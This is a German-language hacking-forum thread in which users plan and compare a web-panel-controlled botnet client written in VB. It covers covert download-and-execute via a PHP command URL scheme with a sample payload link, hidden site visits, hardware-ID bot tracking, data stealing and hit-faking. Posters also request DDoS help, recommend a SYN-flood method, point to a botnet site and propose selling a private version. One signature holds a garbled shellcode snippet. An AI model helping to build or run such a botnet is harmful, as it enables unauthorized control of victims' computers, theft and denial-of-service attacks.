SceCo - Webpanel Bot

• So hab mir überlegt ein Webpanelbot in VB zu programieren, da ich aber nicht grade der Pro in VB bin werde ich eure hilfe benötigen. Vorerst soll die v0.1 folgende funktionen haben:

- Download exe & ausführen
    - URL besuchen, sichtbar und unsichtbar.

weite funktionen werden aufjeden fall folgen.

Meine überlegung, ein VB prog schreiben was auf url.de/bot/add.php?hid=2812901nnfj1cx so nun überprüft das add script

is bot mit hid 2812901nnfj1cx schon in der Datenbank? -> ja, gehe zum nächsten befehl -> nein, trage den bot ein

Das VB progg soll ein timer drin haben der alle 5 min auf die seite url.de/bot/add.php?hid=2812901nnfj1cx zugreift somit kann man den online status sehen, da das PHP script ein Timer drin hat, der besagt, hat sich der bot in den letzten 5 min nicht gemeldet setze Online auf 0

So grob die theorie -

bzgl. des Downloaders und des Besuchers

würde ich so realisiern

Ich sage z.b. download http://xys.de/server.exe 1

der bot greift nun wie jede 5 min auf url.de/bot/add.php?hid=2812901nnfj1cx zu uschaut ob dort der eintrag dw = 1 ist wenn ja springt der bot auf die seite url.de/bot/dw.php?hid=2812901nnfj1cx&sw=http://xys.de/server.exe&hide=1
    so nun weiss der bot aus den variablen was er downloaden muss und was er ausführen muss, in dem gleichen zug setzt er die dw = 0

das genze bei Besucher dings fast gleich.

Was meint ihr kann man das so realisieren?

[LEFT][SIZE=1]Die "Szene" schon seit geburt an herzkrank und über die Jahre bilden sich immer mehr �deme, doch trotzdem schlägt das Herz noch irgendwie.[/SIZE][/LEFT]

• An sich schon eine gute Idee, ich wollte das damals mit C++ machen, und es war wirklich nicht einfach.
    Aber ich bin gespannt

[SIZE=1]"\x68\x6e\x2r\x73\x68" // push dword 68732f6eh
    "\x68\x2f\x2f\x62\x69" // push dword 69622f7fh[/SIZE]

• Also,

Du hast die gleichen Gedanken wie ich aber Probleme :

Ein Bot Ã?ndert die IP = Doppel Eintrag = DB bei Jeden befehl / login leeren .
    Ich rate dir zueinen Timer der nen Handel hat . z.B die Ausgabe der out.php ist

Schreib es lieber als IRC Bot. Gibt hierfür ein paar schöne IRC Classen.

• nene ip ist egal ;) weil pass auf mein bot generiert aus der Hardwareid ein hash dieser hash bleibt ja theoretisch immer gleich, nur wenn der PC ne neue hardware bekommt, die IP wird immer neu in die DB geupdated d.h. Update IP, ... From Bot where HardID = oe902392jkdöasöl somit updatet er nur die ip und die andern einträge weil die HID sich ja nicht ändert :), will ja extra kein IRC , extra Web weils halt davon so wennig gibt und alle user so ein haben willen, ich denke mal dann gibts ne pub version und ne SC version SC nur fürs Team und darf gekauft werden die pub halt für alle

[LEFT][SIZE=1]Die "Szene" schon seit geburt an herzkrank und über die Jahre bilden sich immer mehr �deme, doch trotzdem schlägt das Herz noch irgendwie.[/SIZE][/LEFT]

Einmal editiert, zuletzt von whit3 ()

• White, bist du dir sicher das es ein Webpanel bot bringt ?
    Ich bin gerade an meinem IRC Bot am coden und schon sehr weit.
    Ich habe schon funktionen wie mass download bei rs und upploaded.to usw. :ugly: .
    Können uns ja mal per ICQ unterhalten, vielleicht kann ich dir nen paar Tipps geben :D

Mfg
    jerman08

• Wäre cool werde mo. ein bischen was probieren, wenn ich net weiter komme, werde ich mich aufjeden fall bei dir melden :)

• Ich bin gerade dabei einen Webpanel Bot zu developen, das WIRKLICH einzig wichtige was mir noch fehlt ist nen anständiger DDoS!
    Ansonsten so standart Sachen wie DL & Execute, Memory Execute, Stealings, Updating, Visits, Hit-Faking etc. funkt schon alles perfekt ;)

Wenn mir jemand mit dem DDoS weiterhelfen kann, wär ich ihm sehr dankbar!

Und zu deiner Theorie, ich bin zwar jetzt nur so bisschen drüber geflogen, aber grob mach ich es genau so! Und auch die meisten anderen Webpanel Bots machen das genau so.

Und frag mich bitte nichts über das Panel Coding, dafür hab ich nen eigenen Coder ^^ der macht das alles mit Databases, SQL, php etc.

Achja, und wie ich es schon erwähnt hab, Webpanel Bots sind die Zukunft!
    Grund 1. Man braucht keine beschissenen IRC Server
    Grund 2. Bot connected nur kurz auf den Space (in nem Intervall von 2-5 Min.) und beim IRC ist der Bot in ständiger Connection

usw.

• cool, wen ich bischen hilfe brauche, kann ich auf dich zurück kommen? Bei mir wird das mit php und mysql nicht das problem, eher mit vb, aber erstmal schayun wie der anfag läuft

• Zitat von whit3;15863

cool, wen ich bischen hilfe brauche, kann ich auf dich zurück kommen? Bei mir wird das mit php und mysql nicht das problem, eher mit vb, aber erstmal schayun wie der anfag läuft

Wenn du damit mich meinst, gerne!

• Also Epiphone, wenn du Hilfe zum Thema DoS brauchst, kannst du mich mal fragen ;)
    Ich empfehle dir Socketflood (Kinder nennen das SuperSYN), weil es auf allen Winversionen geht.
    Auf unkn0wn.ws gibt es übrigens viele Sachen zum Thema Botnet & DDOS

• So ich hab mich mal versucht, udn scheiter an VB, hat einer lust das VB bzw. Delphi coding zu übernehmen und ich mach die datenbank geschichte + deisgn?